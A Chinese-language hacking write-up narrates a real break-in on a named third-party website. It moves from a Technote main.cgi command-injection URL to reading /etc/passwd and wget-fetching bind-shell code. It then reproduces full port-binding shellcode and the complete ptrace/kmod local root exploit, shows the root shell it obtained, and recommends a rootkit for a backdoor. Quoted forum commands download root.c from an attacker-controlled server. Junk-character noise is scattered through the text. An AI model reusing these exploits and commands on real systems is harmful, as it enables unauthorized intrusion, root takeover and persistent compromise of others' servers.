从web漏洞到系统root权限过程全展现

韩冰

作者：cnbird

7 K: F# {8 O# t7 p

大家好，我是cnbird，我又回来了，好长时间没有写文章了，今天手痒痒，

所以就写了一篇，希望对与unix的初学者有帮助.欢迎大家和我讨论技术。MainpAge:http://cnbird.hackvip.cn

最近在家研究perl和UNIX服务器的安装和应用，所以很长时间没有进行渗 透了，在学perl和UNIX的话就要傻了，什么也不会了，所以去各大黑客站点

. N0 z# k/ A, h C% H

转转吧，来到了www.nsfocus.net看看吧，有没有什么新的公告啊，Technote 'main.cgi'远程任意命令执行漏洞 这个漏洞引起了我的注意，大致看了看，

9 x5 Y$ p ~7 G2 D" f4 q

知道了这是一个可以远程执行命令的漏洞，下面把漏洞的信息公布一下，Technote是韩国的Technote公司开发的公告牌系统。

# O# d$ A; E) T/ f1 F

Technote的'main.cgi'没有充分过滤用户提交输入，远程攻击者可以利用这

; C4 w) G' i$ h& u

个漏洞以WEB进程权限在系统上执行任意命令。

由于不正确过滤'filename'参数，攻击者提交包含"|command"的数据作为参

数内容，可能以WEB进程权限在系统上执行任意命令。

# X! ?& g: l8 x, ^+ A# _ F9 R

给出利用方法

A8 Y; q3 n$ q( M; x2 ^

_num=5466654&board=rebarz99&command=down_load&filename=rb9.txt|id">http://[target]/cgi-bin/technote/main.cgi/shop.pdf?down_num=5466654&board=rebarz99&command=down_load&filename=rb9.txt|id|

+ m3 e7 E1 D% b( t

看了看利用方法觉得很简单，所以打算自己写一个perl的漏洞利用程序，

看了半天，终于完成了，自己perl新学的原因，所以写的比较简陋，还要自己

" {5 k# ?9 J7 L2 f& K# Y. e: Z

修改路径，很麻烦，我就不公布了，省的高手见笑。其实这个漏洞成功率还是

1 C" J3 Z* W& m# s; ?9 O R/ _5 o

很高的，基本上90%以上吧，对于咱们这些经常搞安全的应该说是一个好消息.

" b' B1 `& ~/ j* m9 i8 b- G1 d$ [

^_^.

好了开始咱们这次难得的入侵之旅吧,这篇文章看着很简单，其实融合我多年

的经验（其实就1-2年）,首先要测试这个漏洞，先要找这样的论坛，

google.com就是方便，一下子找到了一大堆，好了随便挑一个进行测试吧，哈哈哈就拿你开口吧。

$ A9 }& H1 A1 L, w! c

http://www.sealia.com/cgi-bin/technote/main.cgi首先大致看了看，然后就开始吧，

' _; Z6 ^ N, s+ s# D$ L

按照绿盟给出的公告测试一下，输入_num=5466654&board=rebarz99&command=down_load&filename=rb9.txt|id">http://www.sealia.com/cgi-bin/technote/main.cgi/shop.pdf?down_num=5466654&board=rebarz99&command=down_load&filename=rb9.txt|id|

$ I" k5 @. d5 ?

结果如图1

' Q# M& [; i9 x7 c9 i2 Z

* J4 f' I6 ?: T( F3 D

大家看到结果了

uid=99(nobody) gid=99(nobody) groups=99(nobody) ! f; d$ c& K% |4 n$ M下面就开始利用我自己写的程序来完成工作了，毕竟在IE里面输太麻烦了， 0 [3 q* Q( f4 ^$ L5 K8 ]; l我程序的工作 , O! {4 E/ ~0 |; x' d# t5 z界面。如图2

8 S" e( v1 R+ l2 }0 P' }* c

. Y* }$ L1 z1 T% K7 ^9 U9 H7 O7 ~

依次输入IP和端口，就可以直接运行程序了，输入id呵呵，和IE里面基本上差

不多，

如图3

6 \( O/ s, c1 b9 @$ P

% g' c0 g9 i. H9 ^: t2 ^

呵呵到这里我想大家的思路就是上传一个webshell然后在webshell里面搞了，

* \/ b, e# H5 S+ J! E: {- `; x* b

其实我也有这样的想法，可是我已经习惯了UNIX的命令行模式了，虽然能写一个webshell，但是我并没有这样做，我的目的是拿到root权限，大家一定问了，你连主机都没有连上呢，你怎么拿到root啊，小伙子你问的不错，奖你个梨吃，呵呵，下面我的思路就是登陆到机器上面，上面大家已经看到了，我们id命令的输出是uid=99(nobody) gid=99(nobody) groups=99(nobody)，权限还是很低的，试试能不能拿到/etc/passwd然后跑密码，然后执行[www.sealia.com]$ cat /etc/passwd

2 t$ k* H* B% A' N, e7 r1 I

不错，能拿到/etc/passwd。

8 E7 u, v0 |5 a. e: j

如图4

呵呵已经得到/etc/passwd了，我们用流光去跑密码吧，当然我没有指望它能跑出来，等待的时间真漫长啊，无聊，都已经5点50分了，天天晚上，哦哦不是晚上了，是早晨这个时候睡觉，然后12点起来，天天如此，哎，，苦啊。。。

0 H6 K% Y7 j+ C$ N8 \, W! y

去forum.zone-h.org看看帖子吧，也许能找到什么灵感呢！无意间来到了http://forum.zone-h.org/viewtopic.php?t=1168&highlight=phpbb他们正在讨论phpbb的漏洞利用方法和代码，看看吧，虽然已经很老很老了，呵呵其实说实话，不怕各位见小，我以前问在这里问过问题，很长时间没有来了，看看他们有没有给回复啊

如图5

( Z$ w0 q6 h7 t$ q: h

0 k# z- z7 \, |0 h/ W3 U

呵呵见笑了，真没想到他们给的答案还很全面，^_^连什么程序都给出了，老外就是实在...呵呵...

' B- ^! H! Z* m9 I2 q

This one works fine

http://rst.void.ru/download/r57phpbb2010.txt

upload, someth like this

) m: R! y# G% M2 j

./exploit.pl victimhost:port /php_root/ topic_num "wget -O /var/tmp/.r.c http://myhttpserver:port/exploit/root.c"

: D" |: S5 i4 ]./exploit.pl victimhost:port /php_root/ topic_num "gcc /var/tmp/.r.c -o .root"

9 w" l9 o i1 M/ C! H- ?6 Y

: p$ e5 `$ a6 X. fexec on victim hots same shit

and binding shell

1 T# T- s2 u( K+ N

http://shellcode.org/Shellcode/Linux/shell-bind-shell.html

5 Q1 l+ l% z/ V: d

回答的让我很满意啊，正好就试试他们给的方法吧，其实以前我也知道这样的方法的就是没有binding shell（就是把/bin/sh绑定到端口上）。好了说了这么多离题的话，我们还是赶紧做我们的事吧.

8 O% W$ {# b6 ?+ }3 r

首先来到了http://shellcode.org/Shellcode/Linux/shell-bind-shell.html看了看，

# I. ~1 X' w! L( [$ c' W$ t1 V

This piece of code will open a socket for listening upon port 20000 and spawn a shell for all incoming connections.

2 j( a. b8 ?* s

This would be ideal for a system which you didn't have a direct login shell upon.

. e9 S7 s$ K+ `: v0 U. G

从描述上来看是linux的binding shell，并且绑定到了20000端口，下面有该程序的下载地方，真方便啊，http://shellcode.org/Shellcode/Linux/shell-bind-shell.c

给出代码

* u2 e+ O: F& j: s% X3 K; }( H

/* 92 bytes iscntrl() evading portbinding shellcode - linux-x86 ) J- r7 k$ i% C+ M3 r% C * - by bighawk (bighawk@warfare.com) * * This shellcode binds a shell on port 20000 ) M! y* q( R1 S! J * 4 |: A x7 T& W * stdin, stdout and stderr are dupped. accept() arguments are sane. */

' J4 l: g# h% [) e: W8 D% c' r8 L

char code[] =

+ A# k+ Z* X: |9 w' P2 _

"\x31\xdb" // xor ebx, ebx 2 M6 ^3 Y& j1 N" k7 j "\xf7\xe3" // mul ebx 3 g! J2 R- M% O' E9 H3 I "\xb0\x66" // mov al, 102 "\x53" // push ebx 5 F8 \7 w8 ~& A. _' ]3 K "\x43" // inc ebx "\x53" // push ebx "\x43" // inc ebx "\x53" // push ebx "\x89\xe1" // mov ecx, esp ; w8 k/ L1 j/ ]+ E "\x4b" // dec ebx & h/ X8 @+ g. O$ i& W "\xcd\x80" // int 80h - ~2 `/ x& A/ Y0 G "\x89\xc7" // mov edi, eax "\x52" // push edx ! {, K' U9 P9 l "\x66\x68\x4e\x20" // push word 8270 4 e. w: C' G c "\x43" // inc ebx 0 J' R' W- `9 n- @ "\x66\x53" // push bx & e) k5 t9 k; Z. K" T/ I: I "\x89\xe1" // mov ecx, esp "\xb0\xef" // mov al, 239 - g. t6 j; i+ B$ X3 {! [ "\xf6\xd0" // not al $ [1 n A0 h1 J+ [! s* H "\x50" // push eax , I, u' Z, z' l9 o' I "\x51" // push ecx 3 k$ n6 O* j; U5 Q% b! j Y "\x57" // push edi "\x89\xe1" // mov ecx, esp + J! L( J B- U* Y2 P; a; b2 i "\xb0\x66" // mov al, 102 0 _5 M* x1 u. A7 N( i5 g "\xcd\x80" // int 80h . Q) U M6 o- c$ G& P! g' T( \ U1 K "\xb0\x66" // mov al, 102 # i& d( G V# C- j5 y "\x43" // inc ebx " R7 f* s1 G) v% a$ H* u "\x43" // inc ebx % C! Y; N8 C3 S3 k6 E( x "\xcd\x80" // int 80h + q, V# V R" Y "\x50" // push eax 3 V$ N) u: X5 y% a "\x50" // push eax "\x57" // push edi "\x89\xe1" // mov ecx, esp "\x43" // inc ebx "\xb0\x66" // mov al, 102 "\xcd\x80" // int 80h "\x89\xd9" // mov ecx, ebx % i4 s; ?" M. s; J& q# l! X "\x89\xc3" // mov ebx, eax "\xb0\x3f" // mov al, 63 "\x49" // dec ecx "\xcd\x80" // int 80h "\x41" // inc ecx " y3 M2 L2 U; r0 F+ [& d) @, t "\xe2\xf8" // loop lp "\x51" // push ecx 0 t$ a% @# o" n- }: _% x2 k "\x68\x6e\x2f\x73\x68" // push dword 68732f6eh "\x68\x2f\x2f\x62\x69" // push dword 69622f2fh 3 ^( {' L6 E" o: {" G- \+ S "\x89\xe3" // mov ebx, esp 6 g$ |, o/ e0 N$ j- F6 S6 r+ s. ]/ @ "\x51" // push ecx "\x53" // push ebx "\x89\xe1" // mov ecx, esp 0 @& D$ J* e& E" t+ p) a "\xb0\xf4" // mov al, 244 / b+ a4 f0 _4 o l/ ] "\xf6\xd0" // not al 4 I: }1 |" q8 o2 V- J "\xcd\x80"; // int 80h

/ G6 g0 u$ Y- W; P7 N1 ymain() { void (*a)() = (void *)code; int i; . I7 j7 D; i& {2 C printf("size: %d bytes\n", strlen(code)); printf("Testing for cntrl characters.. "); 6 f5 S& R) y) W for(i=0;i if(iscntrl(code)) printf("FAILED\n"), exit(255); 8 g8 V( |- k5 [* H4 P printf("PASSED\n"); a(); 3 l2 ]* ^- h) u( ?} 4 c$ a0 Y- O1 O% W0 H: ]2 } 好了我们已经知道该下载地址

韩冰

http://shellcode.org/Shellcode/Linux/shell-bind-shell.c了， 就可以用wget这个命令来下载了，输入 ( q$ W$ K a% J/ h; xwget http://shellcode.org/Shellcode/Linux/shell-bind-shell.c -P /tmp意思 就是下载这个shell.c到/tmp目录下，如图6

7 p1 ~; @* ~' q- d' M- r然后ls /tmp得到下面的结果，[www.sealia.com]$ ls /tmpDate: Sat, 29 Jan 2005 22:17:14 GMTServer: Apache/1.3.29 (Unix) mod_throttle/3.1.2 PHP/4.3.8 PHP/3.0.18Set-Cookie: sealiakleadata1=|||1|; expires=Sunday, 31-Dec-01 23:59:59 GMT;Set-Cookie: koX8iT3Dda=-kleadata1-;Transfer-Encoding: chunkedContent-Type: text/plain - k1 L! m9 j" _# i( ~! q& P! p% Y8 Z: |2bdlost+foundmremap_pte.cmysql.sockptrace.csess_0a3d59b6da83717a4c05fbc5c6429982sess_12981c19e4cdab7bc426af965e7c85desess_33c246570a69e0846eaaedaef61f0402sess_4eb43cb41a450e8a7d15998fe4e9ef82sess_5c2048e3188733f41bba9a1ab44a4f3bsess_6405a9b3e0a809d7f298ad598f5de180sess_67fc6892112d2d780a092664353dcbbasess_9e3a2581194c05f598543f10294a95edsess_a0332a716e5c0a0932331ce9a5ec64d2sess_a159ec1f21a671d5cfe201c384d8da1csess_c6f579b218f096eb5ba11fdbad90f248sess_cdea344ed2940c99c1fcc146c5322882sess_f1e8e705bb1a6c5197ab61a22442da90shell-bind-shell.cshell-bind-shell.c.1ssh-XX0CyKEcssh-XX7eRJNnssh-XX89utqmssh-XXEmor9Xssh-XXhC36Gwssh-XXpOcVIAssh-XXrhx8enssh-XXss6aKsssh-XXw2rzSs 这个时候就说明已经成功了，现在我们查找一下gcc在哪里，别到时候闹了半天 在没有gcc就麻烦了，然后输入whereis -b gcc意思就是查找gcc的全路径输出结果 [www.sealia.com]$ whereis -b gccDate: Sat, 29 Jan 2005 22:21:06 GMTServer: Apache/1.3.29 (Unix) mod_throttle/3.1.2 PHP/4.3.8 PHP/3.0.18Set-Cookie: sealiakleadata1=|||1|; expires=Sunday, 31-Dec-01 23:59:59 GMT;Set-Cookie: koX8iT3Dda=-kleadata1-;Transfer-Encoding: chunkedContent-Type: text/plain / h% b% v' ^3 ]4 Q/ x! |12gcc: /usr/bin/gcc 0 ^4 Z+ F/ {% U0 A# p* y好了找到gcc了，接下来的事就好办了，编译源程序gcc shell-bind-shell.c -o bind 编译成功在/tmp目录下多了一个我们编译的bind程序，下面我们就来执行它吧， /tmp/bind程序执行的很慢哦.....大概等了1-2分钟程序执行完成，根据程序的介绍我 们知道他开了20000端口，我们telnet 上去吧，telnet www.sealia.com 20000 0 o4 B& l! e2 A/ M哈哈连接上了这个时候摸瞎输入id;uname -a 我晕怎么出现"command not found" 呢，我晕了，没错啊，看看源程序吧，找到了最后，哈哈知道了原因， Note: To use this you will need to make sure that you append '\n\0' to your entered strings, otherwise you will receive errors saying "command not found".The following is a simple means of doing that: perl -e '$|++;while (<>) { print . "\n\x00"; }' | nc hostname 20000 (nc is netcat).好了知道为什么了，我们就换nc提交吧，执行nc -vv www.sealia.com 20000然后出现了C:\WINDOWS\system32>nc -vv www.sealia.com 20000Warning: inverse host lookup failed for 61.100.181.12: h_errno 11004: NO_DATAwww.sealia.com [61.100.181.12] 20000 (?) open在黑暗中输入id输出结果uid=99(nobody) gid=99(nobody) groups=99(nobody)如图7

呵呵到这里我们可爱的流光还在跑呢，跑了将近半个小时了，不等了，关闭它，太浪费资源了，这个时候我大概知道他是一个linux的操作系统，但不知道内核版本输入uname -r 可以看到这个linux的内核iduid=99(nobody) gid=99(nobody) groups=99(nobody)uname -r2.4.20-31.92.4.20的，下面咱们来提升权限吧，就是拿到root，这里说明一下这里有2个很好用的漏洞利用程序，一个是Linux Kernel do_mremap VMA本地权限提升漏洞（漏洞利用程序下载地址_pte.c">http://rhea.oamk.fi/~pyanil00/temp/mremap_pte.c)和Linux kernel 2.2.x - 2.4.x ptrace/kmod local root exploit好了都准备好了，咱们开始提升权限吧，大家先把咱们要利用的程序输入到linux里面cd /tmp;cat >1.c然后复制代码右键输入代码/* 5 x$ p x: N9 S3 r6 U! |* Linux kernel ptrace/kmod local root exploit * 2 \5 n8 C5 |0 i! ^; S7 }' y1 @* This code exploits a race condition in kernel/kmod.c, which creates 7 f! N. Y+ e# e# i* kernel thread in insecure manner. This bug allows to ptrace cloned * process, allowing to take control over privileged modprobe binary. - ] P; J6 T. w( p$ m' l6 V* * Should work under all current 2.2.x and 2.4.x kernels. * * I discovered this stupid bug independently on January 25, 2003, that 3 [+ v$ a4 s. P8 U5 Z) s* is (almost) two month before it was fixed and published by Red Hat % Z0 `) w3 P) V0 L- b4 ?# H* and others. 5 H8 E) s0 Q% p' [7 m" b* * Wojciech Purczynski <cliph@isec.pl> : c' s$ S: w% j, O* * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* 8 s1 Y. m% @( y( _: O5 p& B$ r* IT IS PROVIDED "AS IS" AND WITHOUT ANY WARRANTY " H' h; `0 a3 v0 g s5 ? j* 5 r: \ z+ f* _9 t! U* (c) 2003 Copyright by iSEC Security Research 4 \3 ?- {' O3 @; Q% |$ L9 f*/

#include #include 0 n- ?# v+ M, q' C. v1 C#include " y, q- V; P% R! }#include " F. r- u! `/ d3 o#include : }5 U, M* f) J, K; s#include r( G4 ?8 q4 F2 a% @#include . K8 b7 d$ c2 p: l#include #include / d' I* w) T F#include #include #include #include + `; H/ Q+ x' Z0 G- q#include #include & \9 C) m f% I2 b! o- s2 A7 u# M- j#include

char cliphcode[] = ! E1 B: ^. I( t& ? a/ T"\x90\x90\xeb\x1f\xb8\xb6\x00\x00" "\x00\x5b\x31\xc9\x89\xca\xcd\x80" "\xb8\x0f\x00\x00\x00\xb9\xed\x0d" "\x00\x00\xcd\x80\x89\xd0\x89\xd3" 6 r* g- E( W( Z* ~; Z"\x40\xcd\x80\xe8\xdc\xff\xff\xff";

#define CODE_SIZE (sizeof(cliphcode) - 1)

pid_t parent = 1; pid_t child = 1; - P6 N/ G( ]% r! x' z' [' `# Kpid_t victim = 1; u' P$ L: m9 ^4 Z" uvolatile int gotchild = 0;

void fatal(char * msg) { perror(msg); * t4 ]# [0 |2 t5 r: [3 k2 u8 dkill(parent, SIGKILL); Y; Q# {# h9 Dkill(child, SIGKILL); kill(victim, SIGKILL); 7 ^% y' j& y5 Y+ Z}

void putcode(unsigned long * dst) { char buf[MAXPATHLEN + CODE_SIZE]; 6 C( M6 h& @0 u% V3 uunsigned long * src; int i, len;

memcpy(buf, cliphcode, CODE_SIZE); ) Q5 Z4 M; [& v5 Q" t6 Ylen = readlink("/proc/self/exe", buf + CODE_SIZE, MAXPATHLEN - 1); if (len == -1) fatal("[-] Unable to read /proc/self/exe");

len += CODE_SIZE + 1; 8 W4 J) ~+ i, B% z9 A$ ubuf[len] = '\0';

src = (unsigned long*) buf; 7 W% U/ Z0 Y" [) R$ R% \for (i = 0; i < len; i += 4) 9 ^4 j" ^, K8 q i% R3 m9 a$ \; tif (ptrace(PTRACE_POKETEXT, victim, dst++, *src++) == -1) " q" J$ O/ w8 L" S! ?7 \: N4 Ifatal("[-] Unable to write shellcode"); }

void sigchld(int signo) { & X7 v/ P+ k. a; P. Cstruct user_regs_struct regs;

if (gotchild++ == 0) return;

fprintf(stderr, "[+] Signal caught\n");

if (ptrace(PTRACE_GETREGS, victim, NULL, 畇) == -1) fatal("[-] Unable to read registers");

fprintf(stderr, "[+] Shellcode placed at 0x%08lx\n", regs.eip);

putcode((unsigned long *)regs.eip);

fprintf(stderr, "[+] Now wait for suid shell...\n");

if (ptrace(PTRACE_DETACH, victim, 0, 0) == -1) / V o" D9 |+ i% O- i: c; L. ^fatal("[-] Unable to detach from victim");

exit(0); }

void sigalrm(int signo) 1 g) \0 a0 T8 ]6 u) ^{ errno = ECANCELED; fatal("[-] Fatal error"); 1 T* @7 B" Q! ]}

void do_child(void) " @' Q p4 D9 X4 J( G# |9 f9 i{ 7 S2 C! d. P; K: yint err;

child = getpid(); victim = child + 1;

signal(SIGCHLD, sigchld);

do # w! I% F9 b+ i3 Y# g7 Ierr = ptrace(PTRACE_ATTACH, victim, 0, 0); while (err == -1 && errno == ESRCH);

if (err == -1) fatal("[-] Unable to attach");

fprintf(stderr, "[+] Attached to %d\n", victim); : E% ]0 ?6 D1 H4 w% T' }while (!gotchild) ; 1 c, D/ c B U2 a0 N0 Xif (ptrace(PTRACE_SYSCALL, victim, 0, 0) == -1) ) H; Z, y3 I1 M( u1 E3 I1 Q8 K0 Qfatal("[-] Unable to setup syscall trace"); fprintf(stderr, "[+] Waiting for signal\n");

for(;;); 8 S8 w8 Q$ l1 @+ x" C2 ?}

void do_parent(char * progname) { struct stat st; . F9 A) z, |+ P' \3 n: w; ]int err; : o" z; I, v& Eerrno = 0; 0 Z7 g0 _0 F$ v# x/ x* a( Zsocket(AF_SECURITY, SOCK_STREAM, 1); do { ; {1 D! ~5 C3 v) h. yerr = stat(progname, &st); 9 k* Q" H2 B4 m8 o L- p% p} while (err == 0 && (st.st_mode & S_ISUID) != S_ISUID);

if (err == -1) % p% X. S, i9 R& p$ pfatal("[-] Unable to stat myself");

alarm(0); 4 p' p0 K. `2 E+ @& \system(progname); }

void prepare(void) - q T& [. R7 C+ C- t9 q{ 8 d6 Y4 U! K) X5 Q) s# j0 gif (geteuid() == 0) { & |3 D2 b* H4 m. U/ ?+ s6 {, binitgroups("root", 0); , f* V7 ^" C, ?: t! vsetgid(0); . U7 p0 p' `0 H* S" rsetuid(0); 5 z; {0 Z3 \. [" U0 y8 dexecl(_PATH_BSHELL, _PATH_BSHELL, NULL); 3 J$ X0 X. ?( S9 H: y+ nfatal("[-] Unable to spawn shell"); } }

int main(int argc, char ** argv) { prepare(); $ e6 V2 G Z! ]# Nsignal(SIGALRM, sigalrm); alarm(10);

parent = getpid(); & x/ A8 T' Y1 E6 x5 ?0 Echild = fork(); + D) m$ N$ x9 j. a. Pvictim = child + 1;

if (child == -1) ; W+ Z! {% U: L$ l- y$ }4 |/ n/ ~fatal("[-] Unable to fork");

if (child == 0) do_child(); ) X8 _3 F. P( @+ Yelse do_parent(argv[0]);

return 0; }CRTL+C保存，然后编译gcc 1.c -o 1编译成功，然后输入./1程序开始执行了，-> Parent's PID is 2313. Child's PID is 2314.-> Attaching to 2315...-> Got the thread!!-> Waiting for the next signal...-> Injecting shellcode at 0x4000e85d-> Bind root shell on port 24876... =p-> Detached from modprobe thread.-> Committing suicide..... iduid=0(root) gid=0(root) groups=0(root)哈哈到这个时候我们已经是root了，剩下的工作就是安装后门了，大家可以参考我另外的一篇文章，more.asp?name=cnbird&id=522还有推荐一个不错的rootkitpacketstormsecurity.org/UNIX/penetration/rootkits/lrk5.src.tar.gz好了到这里所有的工作就算已经完成了，其实从入侵中我们可以看出来我们做网站的一定要重视web漏洞，这一点点的小漏洞就可以把能拿到系统的最高权限，可见其危害性，希望国内的网管能够重视起来.